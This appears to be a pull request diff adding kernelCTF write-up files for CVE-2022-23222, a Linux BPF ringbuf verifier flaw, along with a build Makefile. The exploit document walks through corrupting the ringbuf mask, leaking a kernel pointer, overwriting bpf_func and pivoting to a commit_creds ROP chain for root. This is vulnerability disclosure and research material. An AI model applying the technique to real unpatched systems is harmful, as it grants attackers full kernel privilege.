Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
154 changes: 154 additions & 0 deletions pocs/linux/kernelctf/CVE-2022-23222_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,154 @@
## Overview

There are many types of BPF programs and only some of them are available to unprivileged users.

For this exploit we will use socket filter programs, but we will run them using the BPF_PROG_TEST_RUN command instead of attaching to a socket.
This gives us the ability to provide in/out context and pass the data to/from the program easily.

At the beginning we create two ringbuf maps.

The exploit itself consists of 4 BPF programs.

All except the last one (which executes our ROP chain) call the ringbuf_reserve() and ringbuf_discard() BPF functions - all ringbuf_reserve() calls must be followed by ringbuf_discard() or ringbuf_commit(), otherwise the verifier will complain about unreleased resources.

## Stage 1 - corrupting struct bpf_ringbuf

struct bpf_ringbuf looks like this:
```
struct bpf_ringbuf {
wait_queue_head_t waitq; /* 0 0x18 */
struct irq_work work; /* 0x18 0x18 */
u64 mask; /* 0x30 0x8 */
struct page * * pages; /* 0x38 0x8 */
int nr_pages; /* 0x40 0x4 */

spinlock_t spinlock __attribute__((__aligned__(64))); /* 0x80 0x4 */

long unsigned int consumer_pos __attribute__((__aligned__(4096))); /* 0x1000 0x8 */
long unsigned int producer_pos __attribute__((__aligned__(4096))); /* 0x2000 0x8 */
char data[] __attribute__((__aligned__(4096))); /* 0x3000 0 */
};
```

It's a variable-length object that stores both metadata and the contents of the ringbuf and it is allocated using alloc_pages_node() + vmap() in bpf_ringbuf_area_alloc().

Here's how this object is initialized:
```
static struct bpf_ringbuf *bpf_ringbuf_alloc(size_t data_sz, int numa_node)
{
struct bpf_ringbuf *rb;

rb = bpf_ringbuf_area_alloc(data_sz, numa_node);
if (!rb)
return NULL;

spin_lock_init(&rb->spinlock);
init_waitqueue_head(&rb->waitq);
init_irq_work(&rb->work, bpf_ringbuf_notify);

rb->mask = data_sz - 1;
rb->consumer_pos = 0;
rb->producer_pos = 0;

return rb;
}

```

One of the most important fields is 'mask' - it stores the data size of a ringbuf (max_entries-1) and is used by bpf_ringbuf_reserve() to check if the size requested by the caller is within the boundaries of the ringbuf.


Stage 1 BPF program makes only 2 calls:
1. rec = ringbuf_reserve(ringbuf, 0x10, 0) // rec == rb->data+8
2. ringbuf_discard(rec - 0x2fd0) // rec - 0x2fd0 == &rb->mask + 8

ringbuf_discard() is handled by the bpf_ringbuf_commit() with discard=true argument:

```
static void bpf_ringbuf_commit(void *sample, u64 flags, bool discard)
{
unsigned long rec_pos, cons_pos;
struct bpf_ringbuf_hdr *hdr;
struct bpf_ringbuf *rb;
u32 new_len;

hdr = sample - BPF_RINGBUF_HDR_SZ; // [1]
rb = bpf_ringbuf_restore_from_rec(hdr);
new_len = hdr->len ^ BPF_RINGBUF_BUSY_BIT;
if (discard)
new_len |= BPF_RINGBUF_DISCARD_BIT;

/* update record header with correct final size prefix */
xchg(&hdr->len, new_len); // [2]
...
}

struct bpf_ringbuf_hdr {
u32 len;
u32 pg_off;
};

```

Because we pointed sample at &rb->mask + 8, hdr at [1] will point at rb->mask, so hdr.len maps to the first 32 bits of rb->mask.
Our ringbuf was created with max_entries value of 0x2000, so rb->mask / hdr->len is 0x1fff at this point.
After OR-ing with BPF_RINGBUF_DISCARD_BIT new_len becomes 0xc0001fff and this value is saved in rb->mask at [2].

This means we are now able to read/write to ~3 GB of memory starting at rb->data.

## Stage 2 - leaking kernel function pointer

This program makes following operations:

1. rec = ringbuf_reserve(ringbuf, 0x6000, 0)
2. fnptr = rec[0x4fe0 + 0x28] // This points to work.func field of the second allocated ringbuf
3. ctx->cb[0] = fnptr // for socket filters context is struct \_\_sk_buff and we are able to write only to selected fields like cb
4. ringbuf_discard(rec, 1)

We can now read the address of bpf_ringbuf_notify from the context to calculate the kernel base.

## Stage 3 - writing ROP to an array map and overwriting bpf_prog->bpf_func

BPF program objects (struct bpf_prog) are allocated using vmalloc so we can place one after our ringbuf objects.
The most important field of that object is:
```
unsigned int (*bpf_func)(const void *, const struct bpf_insn *); /* 0x30 0x8 */
```

This is a function that gets called when a BPF program is executed.

Here's what our stage 3 program does:

1. rec = ringbuf_reserve(ringbuf, 0x20000)
2. new_bpf_func = ctx->cb[0] // Address of a pivot gadget
3. rec[0xcfd8 + 0x30] = new_bpf_func // &bpf_prog.bpf_func
4. skb_load_bytes(test_data_in, 0, 0xcfd8 + 0x48, 0x100) // &bpf_prog.insn
5. ringbuf_discard(rec, 1)

This overwrites bpf_func of the stage4 program and copies ROP provided as skb data to bpf_prog.insn[].

## Stage 4 - executing program to get RIP control

All we have to do now is run the stage 4 program to get RIP control.

## Pivot to ROP

When .bpf_func is called, RSI contains a pointer to bpf_prog.insn, where our ROP is located.

Only 2 gadgets are needed to pivot to the ROP chain:


```
push rsi
jmp qword ptr [rsi + 0x66]
```

and

```
pop rsp
```

## Privilege escalation

The ROP chain does the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to the userspace.
48 changes: 48 additions & 0 deletions pocs/linux/kernelctf/CVE-2022-23222_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_BPF and CONFIG_BPF_SYSCALL
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=457f44363a8894135c85b7a9afd2bd8196db24ab

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64620e0a1e712a778095bd35cbb277dc2259281f

## Affected kernel versions

Introduced in 5.8. Fixed in 5.15.157 and other stable trees.

## Affected component, subsystem

bpf

## Description

Commit message explains the verifier issue well:

> Both bpf_ringbuf_submit() and bpf_ringbuf_discard() have ARG_PTR_TO_ALLOC_MEM
> in their bpf_func_proto definition as their first argument. They both expect
> the result from a prior bpf_ringbuf_reserve() call which has a return type of
> RET_PTR_TO_ALLOC_MEM_OR_NULL.
>
> Meaning, after a NULL check in the code, the verifier will promote the register
> type in the non-NULL branch to a PTR_TO_MEM and in the NULL branch to a known
> zero scalar. Generally, pointer arithmetic on PTR_TO_MEM is allowed, so the
> latter could have an offset.
>
> The ARG_PTR_TO_ALLOC_MEM expects a PTR_TO_MEM register type. However, the non-
> zero result from bpf_ringbuf_reserve() must be fed into either bpf_ringbuf_submit()
> or bpf_ringbuf_discard() but with the original offset given it will then read
> out the struct bpf_ringbuf_hdr mapping.
>
> The verifier missed to enforce a zero offset, so that out of bounds access
> can be triggered which could be used to escalate privileges if unprivileged
> BPF was enabled (disabled by default in kernel).

bpf_ringbuf_submit() and bpf_ringbuf_discard() expect the argument to point to a valid ringbuf record and use it to calculate an address to a struct bpf_ringbuf_hdr without any further checks.

Because of the verifier bug described above we can cause bpf_ringbuf_submit()/bpf_ringbuf_discard() to interpret any data as bpf_ringbuf_hdr, causing out-of-bounds read/write issues leading to arbitrary code execution.

Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
INCLUDES =
LIBS = -pthread -ldl
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17412.294.62.h
gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
sudo apt-get install libkeyutils-dev
Loading
Loading